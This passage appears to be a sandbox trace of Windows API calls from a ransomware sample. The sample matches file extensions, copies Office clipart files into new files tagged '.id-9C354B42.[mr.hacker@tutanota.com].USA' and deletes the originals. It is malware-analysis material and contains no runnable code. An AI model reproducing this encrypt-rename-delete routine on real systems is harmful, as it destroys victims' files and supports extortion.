(lpString=".ppt") returned 4 [0266.031] lstrcmpiW (lpString1=".ppt", lpString2=".rll") returned -1 [0266.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0266.031] lstrlenW (lpString=".zip") returned 4 [0266.031] lstrcmpiW (lpString1=".zip", lpString2=".rll") returned 1 [0266.031] lstrlenW (lpString=".rar") returned 4 [0266.031] lstrcmpiW (lpString1=".rar", lpString2=".rll") returned -1 [0266.031] lstrlenW (lpString=".bz2") returned 4 [0266.031] lstrcmpiW (lpString1=".bz2", lpString2=".rll") returned -1 [0266.031] lstrlenW (lpString=".7z") returned 3 [0266.031] lstrcmpiW (lpString1=".7z", lpString2="rll") returned -1 [0266.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0266.031] lstrlenW (lpString=".dbf") returned 4 [0266.031] lstrcmpiW (lpString1=".dbf", lpString2=".rll") returned -1 [0266.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0266.031] lstrlenW (lpString=".1cd") returned 4 [0266.031] lstrcmpiW (lpString1=".1cd", lpString2=".rll") returned -1 [0266.031] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0266.031] lstrlenW (lpString=".jpg") returned 4 [0266.031] lstrcmpiW (lpString1=".jpg", lpString2=".rll") returned -1 [0266.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0266.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0266.032] lstrlenW (lpString=".doc") returned 4 [0266.032] lstrcmpiW (lpString1=".doc", lpString2=".rll") returned -1 [0266.032] lstrlenW (lpString=".docx") returned 5 [0266.032] lstrcmpiW (lpString1=".docx", lpString2="0.rll") returned -1 [0266.032] lstrlenW (lpString=".pdf") returned 4 [0266.032] lstrcmpiW (lpString1=".pdf", lpString2=".rll") returned -1 [0266.032] lstrlenW (lpString=".xls") returned 4 [0266.032] lstrcmpiW (lpString1=".xls", lpString2=".rll") returned 1 [0266.032] lstrlenW (lpString=".xlsx") returned 5 [0266.032] lstrcmpiW (lpString1=".xlsx", lpString2="0.rll") returned -1 [0266.032] lstrlenW (lpString=".ppt") returned 4 [0266.032] lstrcmpiW (lpString1=".ppt", lpString2=".rll") returned -1 [0266.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0266.032] lstrlenW (lpString=".zip") returned 4 [0266.032] lstrcmpiW (lpString1=".zip", lpString2=".rll") returned 1 [0266.032] lstrlenW (lpString=".rar") returned 4 [0266.032] lstrcmpiW (lpString1=".rar", lpString2=".rll") returned -1 [0266.032] lstrlenW (lpString=".bz2") returned 4 [0266.032] lstrcmpiW (lpString1=".bz2", lpString2=".rll") returned -1 [0266.032] lstrlenW (lpString=".7z") returned 3 [0266.032] lstrcmpiW (lpString1=".7z", lpString2="rll") returned -1 [0266.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0266.032] lstrlenW (lpString=".dbf") returned 4 [0266.032] lstrcmpiW (lpString1=".dbf", lpString2=".rll") returned -1 [0266.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0266.033] lstrlenW (lpString=".1cd") returned 4 [0266.033] lstrcmpiW (lpString1=".1cd", lpString2=".rll") returned -1 [0266.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 85 [0266.033] lstrlenW (lpString=".jpg") returned 4 [0266.033] lstrcmpiW (lpString1=".jpg", lpString2=".rll") returned -1 [0266.033] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0266.033] lstrlenW (lpString="CARBN_01.MID") returned 12 [0266.033] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0267.007] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=9322) returned 1 [0267.007] CloseHandle (hObject=0x348) returned 1 [0267.007] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid")) returned 0x20 [0267.007] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0267.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0267.238] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.250] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.250] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0267.250] GetLastError () returned 0x0 [0267.250] ReadFile (in: hFile=0x2b4, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x246a, lpOverlapped=0x0) returned 1 [0267.252] WriteFile (in: hFile=0x328, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x2470, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x2470, lpOverlapped=0x0) returned 1 [0267.253] ReadFile (in: hFile=0x2b4, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0267.253] WriteFile (in: hFile=0x328, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xec, lpOverlapped=0x0) returned 1 [0267.253] SetEndOfFile (hFile=0x328) returned 1 [0267.253] CloseHandle (hObject=0x328) returned 1 [0267.253] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.253] SetEndOfFile (hFile=0x2b4) returned 1 [0267.255] CloseHandle (hObject=0x2b4) returned 1 [0267.255] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0267.255] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\carbn_01.mid")) returned 1 [0267.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0267.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0267.256] lstrlenW (lpString=".doc") returned 4 [0267.256] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0267.256] lstrlenW (lpString=".docx") returned 5 [0267.256] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0267.256] lstrlenW (lpString=".pdf") returned 4 [0267.256] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0267.256] lstrlenW (lpString=".xls") returned 4 [0267.256] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0267.256] lstrlenW (lpString=".xlsx") returned 5 [0267.256] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0267.256] lstrlenW (lpString=".ppt") returned 4 [0267.256] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0267.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0267.256] lstrlenW (lpString=".zip") returned 4 [0267.256] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0267.256] lstrlenW (lpString=".rar") returned 4 [0267.256] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0267.256] lstrlenW (lpString=".bz2") returned 4 [0267.256] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0267.256] lstrlenW (lpString=".7z") returned 3 [0267.257] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0267.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0267.257] lstrlenW (lpString=".dbf") returned 4 [0267.257] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0267.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0267.257] lstrlenW (lpString=".1cd") returned 4 [0267.257] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0267.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0267.257] lstrlenW (lpString=".jpg") returned 4 [0267.257] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0267.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0267.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0267.257] lstrlenW (lpString=".doc") returned 4 [0267.257] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0267.257] lstrlenW (lpString=".docx") returned 5 [0267.257] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0267.257] lstrlenW (lpString=".pdf") returned 4 [0267.257] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0267.257] lstrlenW (lpString=".xls") returned 4 [0267.257] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0267.257] lstrlenW (lpString=".xlsx") returned 5 [0267.257] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0267.257] lstrlenW (lpString=".ppt") returned 4 [0267.257] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0267.257] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0267.257] lstrlenW (lpString=".zip") returned 4 [0267.257] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0267.258] lstrlenW (lpString=".rar") returned 4 [0267.258] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0267.258] lstrlenW (lpString=".bz2") returned 4 [0267.258] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0267.258] lstrlenW (lpString=".7z") returned 3 [0267.258] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0267.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0267.258] lstrlenW (lpString=".dbf") returned 4 [0267.258] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0267.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0267.258] lstrlenW (lpString=".1cd") returned 4 [0267.258] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0267.258] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 63 [0267.258] lstrlenW (lpString=".jpg") returned 4 [0267.258] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0267.258] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0267.258] lstrlenW (lpString="FINCL_02.MID") returned 12 [0267.258] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0267.259] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=9318) returned 1 [0267.259] CloseHandle (hObject=0x2b4) returned 1 [0267.259] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid")) returned 0x20 [0267.259] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0267.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0267.260] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.260] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.260] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0267.474] GetLastError () returned 0x0 [0267.474] ReadFile (in: hFile=0x2b4, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x2466, lpOverlapped=0x0) returned 1 [0267.476] WriteFile (in: hFile=0x2bc, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x2470, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x2470, lpOverlapped=0x0) returned 1 [0267.477] ReadFile (in: hFile=0x2b4, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0267.477] WriteFile (in: hFile=0x2bc, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xec, lpOverlapped=0x0) returned 1 [0267.477] SetEndOfFile (hFile=0x2bc) returned 1 [0267.477] CloseHandle (hObject=0x2bc) returned 1 [0267.477] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.477] SetEndOfFile (hFile=0x2b4) returned 1 [0267.481] CloseHandle (hObject=0x2b4) returned 1 [0267.481] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0267.482] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fincl_02.mid")) returned 1 [0267.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0267.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0267.482] lstrlenW (lpString=".doc") returned 4 [0267.482] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0267.482] lstrlenW (lpString=".docx") returned 5 [0267.482] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1 [0267.482] lstrlenW (lpString=".pdf") returned 4 [0267.482] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0267.482] lstrlenW (lpString=".xls") returned 4 [0267.482] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0267.482] lstrlenW (lpString=".xlsx") returned 5 [0267.482] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1 [0267.482] lstrlenW (lpString=".ppt") returned 4 [0267.482] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0267.482] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0267.482] lstrlenW (lpString=".zip") returned 4 [0267.483] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0267.483] lstrlenW (lpString=".rar") returned 4 [0267.483] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0267.483] lstrlenW (lpString=".bz2") returned 4 [0267.483] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0267.483] lstrlenW (lpString=".7z") returned 3 [0267.483] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0267.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0267.483] lstrlenW (lpString=".dbf") returned 4 [0267.483] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0267.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0267.483] lstrlenW (lpString=".1cd") returned 4 [0267.483] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0267.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0267.483] lstrlenW (lpString=".jpg") returned 4 [0267.483] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0267.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0267.483] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0267.483] lstrlenW (lpString=".doc") returned 4 [0267.483] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0267.483] lstrlenW (lpString=".docx") returned 5 [0267.483] lstrcmpiW (lpString1=".docx", lpString2="2.MID") returned -1 [0267.483] lstrlenW (lpString=".pdf") returned 4 [0267.483] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0267.483] lstrlenW (lpString=".xls") returned 4 [0267.483] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0267.483] lstrlenW (lpString=".xlsx") returned 5 [0267.483] lstrcmpiW (lpString1=".xlsx", lpString2="2.MID") returned -1 [0267.483] lstrlenW (lpString=".ppt") returned 4 [0267.483] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0267.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0267.484] lstrlenW (lpString=".zip") returned 4 [0267.484] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0267.484] lstrlenW (lpString=".rar") returned 4 [0267.484] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0267.484] lstrlenW (lpString=".bz2") returned 4 [0267.484] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0267.484] lstrlenW (lpString=".7z") returned 3 [0267.484] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0267.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0267.484] lstrlenW (lpString=".dbf") returned 4 [0267.484] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0267.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0267.484] lstrlenW (lpString=".1cd") returned 4 [0267.484] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0267.484] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FINCL_02.MID") returned 63 [0267.484] lstrlenW (lpString=".jpg") returned 4 [0267.484] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0267.484] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0267.484] lstrlenW (lpString="GRDEN_01.MID") returned 12 [0267.484] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0267.801] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=7567) returned 1 [0267.801] CloseHandle (hObject=0x328) returned 1 [0267.801] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid")) returned 0x20 [0267.981] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.011] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0268.016] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.016] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.016] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0268.173] GetLastError () returned 0x0 [0268.181] ReadFile (in: hFile=0x384, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x1d8f, lpOverlapped=0x0) returned 1 [0268.184] WriteFile (in: hFile=0x348, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0x1d90, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0x1d90, lpOverlapped=0x0) returned 1 [0268.186] ReadFile (in: hFile=0x384, lpBuffer=0x3f00020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x394fed4, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesRead=0x394fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.186] WriteFile (in: hFile=0x348, lpBuffer=0x3f00020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x394fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3f00020*, lpNumberOfBytesWritten=0x394fc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.186] SetEndOfFile (hFile=0x348) returned 1 [0268.186] CloseHandle (hObject=0x348) returned 1 [0268.186] SetFilePointerEx (in: hFile=0x384, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x394fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.186] SetEndOfFile (hFile=0x384) returned 1 [0268.195] CloseHandle (hObject=0x384) returned 1 [0268.195] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.267] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\grden_01.mid")) returned 1 [0268.321] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0268.324] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0268.324] lstrlenW (lpString=".doc") returned 4 [0268.326] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.328] lstrlenW (lpString=".docx") returned 5 [0268.329] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.330] lstrlenW (lpString=".pdf") returned 4 [0268.332] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.335] lstrlenW (lpString=".xls") returned 4 [0268.336] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.339] lstrlenW (lpString=".xlsx") returned 5 [0268.341] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.341] lstrlenW (lpString=".ppt") returned 4 [0268.343] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.343] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 63 [0268.343] lstrlenW (lpString=".zip") returned 4 [0268.343] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.343] lstrlenW (lpString=".rar") returned 4 [0268.343] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.344] lstrlenW (lpString=".bz2") returned 4 [0268.344] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.344] lstrlenW (lpString=".7z") returned 3 [0268.344] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.344] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\GRDEN_01.MID") returned 